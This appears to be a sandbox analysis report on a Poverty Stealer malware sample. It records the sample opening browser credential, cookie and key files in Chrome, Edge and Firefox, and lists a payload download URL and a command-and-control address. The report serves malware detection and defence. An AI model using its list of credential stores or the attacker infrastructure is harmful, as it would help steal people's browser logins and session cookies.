Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	0_2_007E4CBF
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Code function: EnumSystemLocalesW,	0_2_007E4F6B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Code function: EnumSystemLocalesW,	0_2_007E4FB6

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe

Code function: 0_2_007D038F GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_007D038F

Stealing of Sensitive Information

Yara detected Poverty Stealer

Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe.12fce40.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe.38f0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe.38f0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe.12b8100.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe.12fce40.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe.12b8100.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2110344890.00000000012B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2110864033.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe PID: 6500, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Remote Access Functionality

Yara detected Poverty Stealer

Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe.12fce40.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe.38f0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe.38f0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe.12b8100.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe.12fce40.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe.12b8100.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2110344890.00000000012B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2110864033.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe PID: 6500, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	2 Obfuscated Files or Information	LSASS Memory	21 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 DLL Side-Loading	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Data from Local System	2 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	23 System Information Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	13 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	42%	ReversingLabs	Win32.Trojan.PovertyStealer
SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
http://x1.c.lencr.org/0	0%	URL Reputation	safe
http://x1.i.lencr.org/0	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://crt.rootca1.amazontrust.com/rootca1.cer0?	0%	URL Reputation	safe
http://crl.rootca1.amazontrust.com/rootca1.crl0	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://bitbucket.org/fcsdcvscvc/sadcasdv/raw/62af221cbc4d137cf4e95f7d66f3ced90597b434/kupee	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
http://ocsp.rootca1.amazontrust.com0:	0%	Avira URL Cloud	safe
146.70.169.164:2227	0%	Avira URL Cloud	safe
https://bitbucket.org/	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
bitbucket.org	104.192.141.1	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://bitbucket.org/fcsdcvscvc/sadcasdv/raw/62af221cbc4d137cf4e95f7d66f3ced90597b434/kupee	false	Avira URL Cloud: safe	unknown
146.70.169.164:2227	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2129123160.000000000AF36000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2156965620.000000000BEBE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2179363915.000000000C784000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2023093738.000000000A3DC000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://bitbucket.org/	SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2110344890.0000000001290000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2129123160.000000000AF36000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2023093738.000000000A3DC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2129123160.000000000AF36000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2156965620.000000000BEBE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2179363915.000000000C784000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2023093738.000000000A3DC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2129123160.000000000AF36000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2156965620.000000000BEBE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2179363915.000000000C784000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2023093738.000000000A3DC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.c.lencr.org/0	SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2275488230.000000000FB2F000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://x1.i.lencr.org/0	SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2275488230.000000000FB2F000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2129123160.000000000AF36000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2156965620.000000000BEBE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2179363915.000000000C784000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2023093738.000000000A3DC000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0?	SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2275488230.000000000FB2F000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2129123160.000000000AF36000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2156965620.000000000BEBE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2179363915.000000000C784000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2023093738.000000000A3DC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0	SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2275488230.000000000FB2F000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
